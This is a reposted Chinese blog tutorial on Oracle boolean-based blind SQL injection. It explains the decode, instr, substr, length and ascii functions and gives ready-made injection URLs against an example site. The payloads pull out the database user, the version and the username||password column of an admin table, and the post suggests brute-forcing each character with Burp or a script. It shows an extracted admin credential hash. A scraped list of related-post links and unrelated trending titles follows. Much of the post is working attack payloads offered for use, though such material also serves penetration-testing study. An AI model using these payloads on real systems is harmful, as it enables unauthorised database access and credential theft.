Oracle基于布尔的盲注总结
0x01 decode 函数布尔盲注
decode(字段或字段的运算,值1,值2,值3)
这个函数运行的结果是,当字段或字段的运算的值等于值1时,该函数返回值2,否则返回3
当然值1,值2,值3也可以是表达式,这个函数使得某些sql语句简单了许多
使用方法:
比较大小
select decode(sign(变量1-变量2),-1,变量1,变量2) from dual; --取较小值
sign()函数根据某个值是0、正数还是负数,分别返回0、1、-1
例如:
变量1=10,变量2=20
则sign(变量1-变量2)返回-1,decode解码结果为“变量1”,达到了取较小值的目的。
SQL> select decode(sign(10-20),-1,10,20) from dual;DECODE(SIGN(10-20),-1,10,20) ----------------------------10
所以这个decode函数在我们注入中的应用
测试当前用户
select decode(user,'SYSTEM',1,0) from dual;
如果是system用户则返回1,不是则返回0.
SQL> select decode(user,'SYSTEM',1,0) from dual;DECODE(USER,'SYSTEM',1,0) -------------------------1SQL> select decode(user,'SYS',1,0) from dual;DECODE(USER,'SYS',1,0) ----------------------0
注入点中decode盲注应用
判断是否是SCOTT用户
http://www.jsporcle.com/a.jsp?username=SMITH' and 1=(select decode(user,'SCOTT',1,0) from dual) --
当前也可以用字符逐个猜解,利用到substr()函数
http://www.jsporcle.com/a.jsp?username=SMITH' and 1=(select decode(substr(user,1,1),'S',1,0) from dual) --
这里只需要替换我们需要查的内容即可 不一一列举了,比如查询Oracle版本,判断版本的字符串第一个字符是否是O
http://www.jsporcle.com/a.jsp?username=SMITH' and 1=(select decode(substr((select banner from sys.v_$version where rownum=1),1,1),'O',1,0) from dual) --
获取当前用户
(select user from dual)
获取当前版本
(select banner from sys.v_$version where rownum=1)
获取当前admin表的帐号和密码
(select username||password from admin)
获取字符长度
select length(user) from dual --
select * from art where id=1 and 6=(select length(user) from dual) --
http://www.jsporcle.com/news.jsp?id=1 and 6=(select length(user) from dual) --
当前用户第一个字母的是否等于S 等于返回1否则返回0
(select decode(substr(user,1,1),'S',1,0) from dual) -- (select decode(substr(user,2,1),'Y',1,0) from dual) -- (select decode(substr(user,3,1),'S',1,0) from dual) -- (select decode(substr(user,4,1),'T',1,0) from dual) -- (select decode(substr(user,5,1),'E',1,0) from dual) -- (select decode(substr(user,6,1),'N',1,0) from dual) --
测试当前用户语句
http://www.jsporcle.com/news.jsp?id=1 and 1=(select decode(substr(user,1,1),'S',1,0) from dual) --
获取当前admin表的帐号和密码
select * from art where id=1 and 1=(select decode(substr((select username||password from admin),1,1),'a',1,0) from dual) http://www.jsporcle.com/news.jsp?id=1 and 1=(select decode(substr((select username%7c%7cpassword from admin),1,1),'a',1,0) from dual)
判断字符的字符
abcdefghigklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789@_.
查询第二个的时候
http://www.jsporcle.com/news.jsp?id=1 and 1=(select decode(substr((select username%7c%7cpassword from admin),2,1),'d',1,0) from dual) --
大概知道这些函数的用法 跑脚本爆破即可 burpsuite为例
0x02 instr函数布尔盲注
instr函数的使用,从一个字符串中查找指定子串的位置。例如:
SQL> select instr('abcdefgh','de') position from dual;
POSITION
----------
4
从1开始算 d排第四所以返回4
盲注中的应用:
http://www.jsporcle.com/news.jsp?id=1 and 1=(instr((select user from dual),'SYS')) --
BURP爆破用户名
0x03 通用盲注方法 逐字猜解
先获取数据长度
37=(select length(username||password) from admin)
转码测试
http://www.jsporcle.com/news.jsp?id=1 and 37=(select length(username%7c%7cpassword) from admin)-- select * from art where id=1 and 37=(select length(username||password) from admin);
猜解ascii码
http://www.jsporcle.com/news.jsp?id=1 and (select ascii(substr(username%7c%7cpassword,1,1)) from admin)=97 --
同样 burp或脚本爆破即可
猜解结果: admine10adc3949ba59abbe56e057f20f883e
转载于:https://www.cnblogs.com/-qing-/p/10951631.html
Oracle基于布尔的盲注总结相关推荐
- oracle 布尔盲注,Oracle基于布尔的盲注总结
0x01 decode 函数布尔盲注 decode(字段或字段的运算,值1,值2,值3) 这个函数运行的结果是,当字段或字段的运算的值等于值1时,该函数返回值2,否则返回3 当然值1,值2,值3也可以 ...
- SQL注入——基于布尔的盲注(八)
本章目的 普及布尔盲注技术的运用场景及条件,熟悉length().substr().ascii()等函数的用法,掌握基于布尔的盲注基本流程.PS:面试回答主要为对错论 基本概念 盲注 在SQL注入过程 ...
- oracle 布尔盲注,Oracle基于延时的盲注总结
0x00 前言 oracle注入中可以通过页面响应的状态,这里指的是响应时间,通过这种方式判断SQL是否被执行的方式,便是时间盲注: oracle的时间盲注通常使用DBMS_PIPE.RECEIVE_ ...
- SQL注入:sqli-labs lesson-8 lesson -9 基于布尔值和基于时间的盲注!
在上一次讲解了lesson -1的sql基本注入,我们在注入的时候,它会返回错误信息 但是盲注不会:什么是盲注:我理解的盲注是,web页面并不会返回错误信息,需要自己添加一些命令来让浏览器进行一些显而 ...
- SQL注入——基于时间的盲注(九)
本章目的 普及延时盲注技术的运用场景及条件,熟悉length().Substr().ascii().sleep().if()等函数的用法,掌握基于时间的盲注基本流程.PS:面试问答不深问就回答延迟 基 ...
- mysql基于时间盲注_MYSQL基于时间的盲注详解
MYSQL基于时间的盲注 联合查询,报错注入,以及布尔盲注,都是基于攻击网站会回显消息,或者将错误信息返回在前端,或者会返回web页面的正确或错误 但是有时候网站关闭了错误回显或过滤了某些关键字,网页 ...
- 渗透测试——sql注入进阶/基于时间的盲注/一看就会/
目录 一.注入点判断 注入类型 SQL注入的类型 二.基于时间的时间盲注 什么是时间盲注 sleep()函数 常用函数 三.bWAPP基于时间的盲注实战 一.注入点判断 1.输入一个单引号',因为语句 ...
- mysql延迟注入br,实验3—SQL注入漏洞的攻击与防御(基于时间延迟的盲注)
1.实验名称 SQL报错注入 2.实验环境 1.攻击机系统环境:Windows 7/8/10 2.浏览器:Firefox 53.0.2(64位) 3.浏览器插件HackBar 1.6.3.1 3.实验 ...
- mysql盲注_Mysql 布尔型盲注手工注入详解
0x00 什么叫布尔型盲注 布尔型 布尔(Boolean)型是计算机里的一种数据类型,只有True(真)和False(假)两个值.一般也称为逻辑型. 盲注 在注入时页面无具体数据返回的注入称之为盲注, ...
最新文章
- SQL故障转移集群操作方法
- 手机APP功能测试经验分享2016.06.06
- 微信公众平台关于fakeid和openid的解析
- 深入探索C++对象模型学习笔记2
- 2040张图片训练出的ViT,准确率96.7%,连迁移性能都令人惊讶 | 南京大学
- 【基础算法】常见的ML、DL编程题
- SpringMVC 学习系列 (4) 之 数据绑定 -1
- 最新linux面试题
- 第一次离线写Blog,先上个图先
- 一道Python面试题
- logistic模型原理与推导过程分析(2)
- Java-面向对象(基础知识)
- android selector 的item/不能是空节点
- .net 基础知识大杂烩(2) ——条件语句
- UML类图、代理学习
- window平台使用网络抓包工具wireshark打开后卡死崩溃的解决
- webgl的平行光漫反射示例
- E. 手机服务(构造+拷贝构造+堆)
- IPad Pro 12.9英寸版本的界面适配
- 诺基亚WP7手机或10月发布 搭载新版系统
热门文章
- 通过jquery-ui中的sortable来实现拖拽排序
- Mysql,ERROR 1044 (42000): Access denied for user ''@'localhost' to database 'mysql'
- HDU 2176(Nim博弈)
- 黑马程序员——java语言基础——组合,关联,聚合的区别
- 利用android studio 生成 JNI需要的动态库so文件
- flink sql planner到底是干嘛用的
- xfce的开始菜单增加搜索框
- ubuntu16.04+Virtualenv+python2.7+Caffe安装(CPU版本,无opencv)
- 本地第一次对接已经存在的github上的repository
- centos云服务器出现No module named ‘_sqlite3′